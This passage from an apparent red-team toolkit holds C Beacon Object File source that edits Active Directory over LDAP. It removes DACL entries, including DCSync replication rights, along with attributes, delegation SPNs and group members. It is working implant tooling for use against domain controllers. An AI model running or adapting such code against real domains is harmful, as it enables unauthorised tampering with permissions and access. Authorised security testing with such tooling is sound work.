        if (aceMask == EXPANDED_GENERIC_EXECUTE) {
            return TRUE;
        }
        // Check if mask contains all core rights
        if ((aceMask & GENERIC_EXECUTE_CORE_RIGHTS) == GENERIC_EXECUTE_CORE_RIGHTS) {
            return TRUE;
        }
    }
    
    return FALSE;
}

// Helper function to check if an ACE matches a specific GUID for extended rights
BOOL DoesAceMatchGuid(PPARSED_ACE_INFO ace, const char* guidString) {
    if (!ace || !guidString) return FALSE;
    
    // Must be an object ACE with object type
    if (!ace->IsObjectAce || !ace->HasObjectType) {
        return FALSE;
    }
    
    // Parse the GUID string and compare
    GUID targetGuid;
    MSVCRT$memset(&targetGuid, 0, sizeof(GUID));
    if (StringToGuid(guidString, &targetGuid)) {
        return AreGuidsEqual(&ace->ObjectType, &targetGuid);
    }
    
    return FALSE;
}

// Helper function to check if an ACE matches our removal criteria
BOOL DoesAceMatch(PPARSED_ACE_INFO ace, const char* trusteeSid, ACCESS_MASK accessMask, 
                  BYTE aceType, GUID** guidsToMatch, DWORD guidCount) {
    if (!ace || !trusteeSid) return FALSE;
    
    // First check: SID must match
    if (!ace->TrusteeSid || MSVCRT$strcmp(ace->TrusteeSid, trusteeSid) != 0) {
        return FALSE;
    }
    
    // If we have GUIDs to match (like DCSync), check those
    if (guidsToMatch && guidCount > 0) {
        // Must be an object ACE with object type
        if (!ace->IsObjectAce || !ace->HasObjectType) {
            return FALSE;
        }
        
        // Check if ACE's GUID matches any of our target GUIDs
        for (DWORD i = 0; i < guidCount; i++) {
            if (guidsToMatch[i] && AreGuidsEqual(&ace->ObjectType, guidsToMatch[i])) {
                return TRUE;
            }
        }
        return FALSE;
    }
    
    // No GUID matching - check access mask and type
    // If access mask is 0, match any mask (remove all ACEs for this trustee)
    if (accessMask == 0) {
        // Check ACE type if specified
        if (aceType != 0xFF && ace->AceType != aceType) {
            return FALSE;
        }
        return TRUE;
    }
    
    // Check if the requested mask is a generic right that might be expanded
    // Handle GENERIC_ALL, GENERIC_WRITE, GENERIC_READ, GENERIC_EXECUTE
    if (accessMask == GENERIC_ALL || accessMask == GENERIC_WRITE || 
        accessMask == GENERIC_READ || accessMask == GENERIC_EXECUTE) {
        
        // Check if ACE mask is the expanded form of the generic right
        if (IsExpandedGenericRight(ace->Mask, accessMask)) {
            // ACE type check
            if (aceType != 0xFF && ace->AceType != aceType) {
                return FALSE;
            }
            return TRUE;
        }
        
        // Also check for literal generic right (rare but possible)
        if (ace->Mask == accessMask) {
            if (aceType != 0xFF && ace->AceType != aceType) {
                return FALSE;
            }
            return TRUE;
        }
        
        return FALSE;
    }
    
    // Normal access mask matching (not a generic right)
    if (ace->Mask != accessMask) {
        return FALSE;
    }
    
    // If aceType is 0xFF (wildcard), match any type
    if (aceType != 0xFF && ace->AceType != aceType) {
        return FALSE;
    }
    
    return TRUE;
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments:
    // target_identifier, is_target_dn, trustee_identifier, is_trustee_dn,
    // access_mask (optional - can be keyword like "DCSync" or hex value),
    // ace_type (optional - 0xFF means any type),
    // ace_index (optional - -1 means use matching, >= 0 means remove specific index),
    // search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* trusteeIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTrusteeDN = BeaconDataInt(&parser);
    char* accessMaskStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* aceTypeStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    int aceIndex = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }
    
    
    // Check if this is a special keyword-based removal (e.g., DCSync)
    BOOL isDCSyncRemoval = IsDCSyncKeyword(accessMaskStr);
    GUID** guidsToMatch = NULL;
    DWORD guidCount = 0;
    GUID dcsyncGuid1, dcsyncGuid2;
    
    if (isDCSyncRemoval) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] DCSync removal detected");
        
        // Parse the two DCSync GUIDs
        MSVCRT$memset(&dcsyncGuid1, 0, sizeof(GUID));
        MSVCRT$memset(&dcsyncGuid2, 0, sizeof(GUID));
        
        if (StringToGuid(GUID_DS_REPLICATION_GET_CHANGES, &dcsyncGuid1) &&
            StringToGuid(GUID_DS_REPLICATION_GET_CHANGES_ALL, &dcsyncGuid2)) {
            
            guidsToMatch = (GUID**)MSVCRT$malloc(2 * sizeof(GUID*));
            if (guidsToMatch) {
                guidsToMatch[0] = &dcsyncGuid1;
                guidsToMatch[1] = &dcsyncGuid2;
                guidCount = 2;
            }
        }
    }
    
    // Determine removal mode
    BOOL removeByIndex = (aceIndex >= 0);
    ACCESS_MASK accessMask = 0;
    BYTE aceType = 0xFF; // Wildcard by default
    
    if (removeByIndex) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Mode: Remove by ACE Index: %d", aceIndex);
    } else {
        // Remove by matching
        if (!trusteeIdentifier || MSVCRT$strlen(trusteeIdentifier) == 0) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Trustee identifier required when not removing by index");
            if (guidsToMatch) MSVCRT$free(guidsToMatch);
            return;
        }
        
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Mode: Remove by matching trustee and permissions");
        
        // Parse access mask and type (unless DCSync)
        if (!isDCSyncRemoval) {
            if (accessMaskStr && MSVCRT$strlen(accessMaskStr) > 0) {
                accessMask = ParseAccessMask(accessMaskStr);
                if (accessMask != 0) {
                    BeaconPrintf(CALLBACK_OUTPUT, "[*] Access Mask: %s (0x%08x)", accessMaskStr, accessMask);
                }
            }
            
            if (aceTypeStr && MSVCRT$strlen(aceTypeStr) > 0) {
                aceType = ParseAceType(aceTypeStr);
                BeaconPrintf(CALLBACK_OUTPUT, "[*] ACE Type: %s (0x%02x)", aceTypeStr, aceType);
            }
            
            if (accessMask == 0 && aceType == 0xFF) {
                BeaconPrintf(CALLBACK_OUTPUT, "[*] Will remove ALL ACEs for this trustee");
            }
        }
    }
    
    // Display optional parameters
    if (searchOu && MSVCRT$strlen(searchOu) > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Search OU: %s", searchOu);
    }
    if (dcAddress && MSVCRT$strlen(dcAddress) > 0) {
    }
    if (useLdaps) {
    }
    
    // Initialize LDAP connection
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Initializing LDAP connection...");
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        if (guidsToMatch) MSVCRT$free(guidsToMatch);
        return;
    }
    
    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        if (guidsToMatch) MSVCRT$free(guidsToMatch);
        CleanupLDAP(ld);
        return;
    }
    
    // Variables for cleanup
    char* targetDN = NULL;
    char* trusteeDN = NULL;
    PSID pTrusteeSid = NULL;
    char* trusteeSidStr = NULL;
    BERVAL* sdBerval = NULL;
    PSD_INFO sdInfo = NULL;
    PSID pObjectSid = NULL;
    char* objectSidStr = NULL;
    DWORD* acesToRemove = NULL;
    PACL pNewDacl = NULL;
    BERVAL* newSdBerval = NULL;
    
    // Resolve target DN
    if (isDCSyncRemoval && !isTargetDN && MSVCRT$strlen(targetIdentifier) == 0) {
        // For DCSync, empty target means domain root
        size_t len = MSVCRT$strlen(defaultNC) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, defaultNC);
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Using domain root: %s", targetDN);
        }
    } else if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            goto cleanup;
        }
    }
    
    if (!targetDN) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve target DN");
        goto cleanup;
    }
    
    // Resolve trustee if removing by match (not by index)
    if (!removeByIndex) {
        
        if (isTrusteeDN) {
            size_t len = MSVCRT$strlen(trusteeIdentifier) + 1;
            trusteeDN = (char*)MSVCRT$malloc(len);
            if (trusteeDN) {
                MSVCRT$strcpy(trusteeDN, trusteeIdentifier);
            }
        } else {
            char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
            trusteeDN = FindObjectDN(ld, trusteeIdentifier, searchBase);
            if (!trusteeDN) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Trustee '%s' not found", trusteeIdentifier);
                goto cleanup;
            }
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Resolved trustee DN: %s", trusteeDN);
        }
        
        // Get trustee's SID
        pTrusteeSid = GetObjectSid(ld, trusteeDN);
        if (!pTrusteeSid) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get trustee's objectSid");
            goto cleanup;
        }
        
        trusteeSidStr = SidToString(pTrusteeSid);
        if (!trusteeSidStr) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert trustee SID to string");
            goto cleanup;
        }
        
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Trustee SID: %s", trusteeSidStr);
    }
    
    // Read current security descriptor
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Reading security descriptor...");
    sdBerval = ReadSecurityDescriptor(ld, targetDN);
    if (!sdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read security descriptor");
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Read security descriptor (%d bytes)", sdBerval->bv_len);
    
    // Parse security descriptor
    sdInfo = ParseSecurityDescriptor((BYTE*)sdBerval->bv_val, sdBerval->bv_len);
    if (!sdInfo) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse security descriptor");
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Current DACL has %d ACE(s)", sdInfo->DaclAceCount);
    
    // Get target's SID for display
    pObjectSid = GetObjectSid(ld, targetDN);
    if (pObjectSid) {
        objectSidStr = SidToString(pObjectSid);
    }
    
    // Determine which ACEs to remove
    DWORD removeCount = 0;
    
    if (removeByIndex) {
        // Remove by specific index
        if (aceIndex >= (int)sdInfo->DaclAceCount) {
            BeaconPrintf(CALLBACK_ERROR, "[-] ACE index %d out of range (max: %d)", 
                        aceIndex, sdInfo->DaclAceCount - 1);
            goto cleanup;
        }
        
        acesToRemove = (DWORD*)MSVCRT$malloc(sizeof(DWORD));
        if (!acesToRemove) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed");
            goto cleanup;
        }
        
        acesToRemove[0] = aceIndex;
        removeCount = 1;
        
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Will remove ACE at index %d:", aceIndex);
        PrintAceInfo(&sdInfo->DaclAces[aceIndex], aceIndex, targetDN, objectSidStr);
        
    } else {
        // Remove by matching - scan for all matching ACEs
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Scanning for matching ACEs...");
        
        // First pass: count matches
        for (DWORD i = 0; i < sdInfo->DaclAceCount; i++) {
            if (DoesAceMatch(&sdInfo->DaclAces[i], trusteeSidStr, accessMask, aceType, 
                           guidsToMatch, guidCount)) {
                removeCount++;
            }
        }
        
        if (removeCount == 0) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] No matching ACEs found for this trustee");
            goto cleanup;
        }
        
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Found %d matching ACE(s) to remove", removeCount);
        
        // Allocate array for indices
        acesToRemove = (DWORD*)MSVCRT$malloc(removeCount * sizeof(DWORD));
        if (!acesToRemove) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed");
            goto cleanup;
        }
        
        // Second pass: collect indices and display
        DWORD idx = 0;
        for (DWORD i = 0; i < sdInfo->DaclAceCount; i++) {
            if (DoesAceMatch(&sdInfo->DaclAces[i], trusteeSidStr, accessMask, aceType,
                           guidsToMatch, guidCount)) {
                acesToRemove[idx++] = i;
                BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Will remove ACE #%d:", i);
                PrintAceInfo(&sdInfo->DaclAces[i], i, targetDN, objectSidStr);
            }
        }
    }
    
    // Get old DACL from security descriptor
    PSECURITY_DESCRIPTOR pSD = (PSECURITY_DESCRIPTOR)sdBerval->bv_val;
    PACL pOldDacl = NULL;
    BOOL daclPresent = FALSE;
    BOOL daclDefaulted = FALSE;
    
    if (!ADVAPI32$GetSecurityDescriptorDacl(pSD, &daclPresent, &pOldDacl, &daclDefaulted)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get DACL from security descriptor");
        goto cleanup;
    }
    
    // Create new DACL without the specified ACEs
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Creating new DACL...");
    pNewDacl = CreateNewDaclWithoutAces(pOldDacl, acesToRemove, removeCount);
    
    if (!pNewDacl) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create new DACL");
        goto cleanup;
    }
    
    // Build new security descriptor
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Building new security descriptor...");
    
    BYTE absoluteSDBuffer[SECURITY_DESCRIPTOR_MIN_LENGTH];
    PSECURITY_DESCRIPTOR pNewSD = (PSECURITY_DESCRIPTOR)absoluteSDBuffer;
    
    if (!ADVAPI32$InitializeSecurityDescriptor(pNewSD, SECURITY_DESCRIPTOR_REVISION)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize security descriptor");
        goto cleanup;
    }
    
    // Copy owner and group from original
    PSID pOwner = NULL;
    BOOL ownerDefaulted = FALSE;
    ADVAPI32$GetSecurityDescriptorOwner(pSD, &pOwner, &ownerDefaulted);
    if (pOwner) {
        ADVAPI32$SetSecurityDescriptorOwner(pNewSD, pOwner, ownerDefaulted);
    }
    
    PSID pGroup = NULL;
    BOOL groupDefaulted = FALSE;
    ADVAPI32$GetSecurityDescriptorGroup(pSD, &pGroup, &groupDefaulted);
    if (pGroup) {
        ADVAPI32$SetSecurityDescriptorGroup(pNewSD, pGroup, groupDefaulted);
    }
    
    // Set the new DACL
    if (!ADVAPI32$SetSecurityDescriptorDacl(pNewSD, TRUE, pNewDacl, FALSE)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set DACL");
        goto cleanup;
    }
    
    // Copy SACL if present
    PACL pSacl = NULL;
    BOOL saclPresent = FALSE;
    BOOL saclDefaulted = FALSE;
    if (ADVAPI32$GetSecurityDescriptorSacl(pSD, &saclPresent, &pSacl, &saclDefaulted)) {
        if (saclPresent) {
            ADVAPI32$SetSecurityDescriptorSacl(pNewSD, TRUE, pSacl, saclDefaulted);
        }
    }
    
    // Convert to self-relative format for LDAP
    newSdBerval = ConvertSecurityDescriptorToBerval(pNewSD);
    if (!newSdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert security descriptor");
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Security descriptor ready (%d bytes)", newSdBerval->bv_len);
    
    // Write back to LDAP
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Writing modified security descriptor...");
    BOOL writeSuccess = WriteSecurityDescriptor(ld, targetDN, newSdBerval);
    
    if (writeSuccess) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] SUCCESS: ACE(s) removed successfully!");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Removed: %d ACE(s)", removeCount);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] New DACL: %d ACE(s) (was %d)", 
                    sdInfo->DaclAceCount - removeCount, sdInfo->DaclAceCount);
        
        if (isDCSyncRemoval) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] DCSync rights revoked");
        }
        
        // Verify
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Verifying changes...");
        BERVAL* verifyBerval = ReadSecurityDescriptor(ld, targetDN);
        if (verifyBerval) {
            PSD_INFO verifyInfo = ParseSecurityDescriptor((BYTE*)verifyBerval->bv_val, 
                                                          verifyBerval->bv_len);
            if (verifyInfo) {
                DWORD expectedCount = sdInfo->DaclAceCount - removeCount;
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Verification: DACL has %d ACE(s) (expected %d)", 
                            verifyInfo->DaclAceCount, expectedCount);
                
                if (verifyInfo->DaclAceCount == expectedCount) {
                    BeaconPrintf(CALLBACK_OUTPUT, "[+] ACE count matches - operation successful");
                } else {
                    BeaconPrintf(CALLBACK_OUTPUT, "[!] Warning: ACE count mismatch");
                }
                
                FreeSecurityDescriptorInfo(verifyInfo);
            }
            MSVCRT$free(verifyBerval->bv_val);
            MSVCRT$free(verifyBerval);
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "\n[-] FAILED to remove ACE(s)");
    }

cleanup:
    // Free all allocated resources
    if (newSdBerval) {
        if (newSdBerval->bv_val) MSVCRT$free(newSdBerval->bv_val);
        MSVCRT$free(newSdBerval);
    }
    if (pNewDacl) MSVCRT$free(pNewDacl);
    if (acesToRemove) MSVCRT$free(acesToRemove);
    if (objectSidStr) MSVCRT$free(objectSidStr);
    if (pObjectSid) MSVCRT$free(pObjectSid);
    if (sdInfo) FreeSecurityDescriptorInfo(sdInfo);
    if (sdBerval) {
        if (sdBerval->bv_val) MSVCRT$free(sdBerval->bv_val);
        MSVCRT$free(sdBerval);
    }
    if (trusteeSidStr) MSVCRT$free(trusteeSidStr);
    if (pTrusteeSid) MSVCRT$free(pTrusteeSid);
    if (trusteeDN) MSVCRT$free(trusteeDN);
    if (targetDN) MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    if (guidsToMatch) MSVCRT$free(guidsToMatch);
    CleanupLDAP(ld);
    
}

================================================
FILE: AD-BOF/LDAP-BOF/src/remove/remove-attribute.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* attribute = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* value = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!attribute || MSVCRT$strlen(attribute) == 0) {
        return;
    }

    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) MSVCRT$strcpy(targetDN, targetIdentifier);
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    LDAPModA attr_mod;
    attr_mod.mod_op = LDAP_MOD_DELETE;
    attr_mod.mod_type = attribute;

    if (value && MSVCRT$strlen(value) > 0) {
        char* attr_values[] = { value, NULL };
        attr_mod.mod_vals.modv_strvals = attr_values;
    } else {
        attr_mod.mod_vals.modv_strvals = NULL;
    }

    LDAPModA* mods[] = { &attr_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully removed attribute '%s'", attribute);
    } else if (result == LDAP_NO_SUCH_ATTRIBUTE) {
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to remove attribute");
        PrintLdapError("Remove attribute", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/remove/remove-delegation.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* spn = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!spn || MSVCRT$strlen(spn) == 0) {
        return;
    }

    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) MSVCRT$strcpy(targetDN, targetIdentifier);
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* spn_values[] = { spn, NULL };
    LDAPModA spn_mod;
    spn_mod.mod_op = LDAP_MOD_DELETE;
    spn_mod.mod_type = "msDS-AllowedToDelegateTo";
    spn_mod.mod_vals.modv_strvals = spn_values;

    LDAPModA* mods[] = { &spn_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully removed delegation SPN '%s'", spn);
    } else if (result == LDAP_NO_SUCH_ATTRIBUTE) {
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to remove delegation");
        PrintLdapError("Remove delegation", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/remove/remove-groupmember.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: group_identifier, is_group_dn, member_identifier, is_member_dn, 
    // search_ou, dc_address, use_ldaps
    char* groupIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isGroupDN = BeaconDataInt(&parser);
    char* memberIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isMemberDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!memberIdentifier || MSVCRT$strlen(memberIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Member identifier is required");
        return;
    }
    
    if (!groupIdentifier || MSVCRT$strlen(groupIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Group identifier is required");
        return;
    }
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context (needed for searches if DN not provided)
    char* defaultNC = NULL;
    char* memberDN = NULL;
    char* groupDN = NULL;
    
    if (!isMemberDN || !isGroupDN) {
        
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Resolve member DN
    if (isMemberDN) {
        // Member identifier is already a DN
        size_t len = MSVCRT$strlen(memberIdentifier) + 1;
        memberDN = (char*)MSVCRT$malloc(len);
        if (memberDN) {
            MSVCRT$strcpy(memberDN, memberIdentifier);
        }
    } else {
        // Search for member by sAMAccountName
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        memberDN = FindObjectDN(ld, memberIdentifier, searchBase);
        
        if (!memberDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve member DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Member '%s' not found", memberIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            CleanupLDAP(ld);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Member DN: %s", memberDN);
    }
    
    // Resolve group DN
    if (isGroupDN) {
        // Group identifier is already a DN
        size_t len = MSVCRT$strlen(groupIdentifier) + 1;
        groupDN = (char*)MSVCRT$malloc(len);
        if (groupDN) {
            MSVCRT$strcpy(groupDN, groupIdentifier);
        }
    } else {
        // Search for group by sAMAccountName
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        groupDN = FindObjectDN(ld, groupIdentifier, searchBase);
        
        if (!groupDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve group DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Group '%s' not found", groupIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            MSVCRT$free(memberDN);
            CleanupLDAP(ld);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Group DN: %s", groupDN);
    }
    
    // Prepare LDAP modification to remove member
    char* member_values[] = { memberDN, NULL };
    LDAPModA member_mod;
    member_mod.mod_op = LDAP_MOD_DELETE;
    member_mod.mod_type = "member";
    member_mod.mod_vals.modv_strvals = member_values;
    
    LDAPModA* mods[] = { &member_mod, NULL };
    
    // Apply the modification
    ULONG result = WLDAP32$ldap_modify_s(ld, groupDN, mods);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully removed member from group");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Member DN: %s", memberDN);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Group DN: %s", groupDN);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to remove member from group");
        PrintLdapError("Modify group", result);
        
        // Provide helpful hints
        if (result == LDAP_NO_SUCH_ATTRIBUTE) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Member is not in the group");
        } else if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions to modify group membership");
        } else if (result == LDAP_NO_SUCH_OBJECT) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Group or member object does not exist");
        } else if (result == LDAP_INVALID_DN_SYNTAX) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid DN syntax");
        }
    }
    
    // Cleanup
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    if (memberDN) MSVCRT$free(memberDN);
    if (groupDN) MSVCRT$free(groupDN);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/remove/remove-object.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: object_identifier, is_object_dn, search_ou, dc_address, use_ldaps
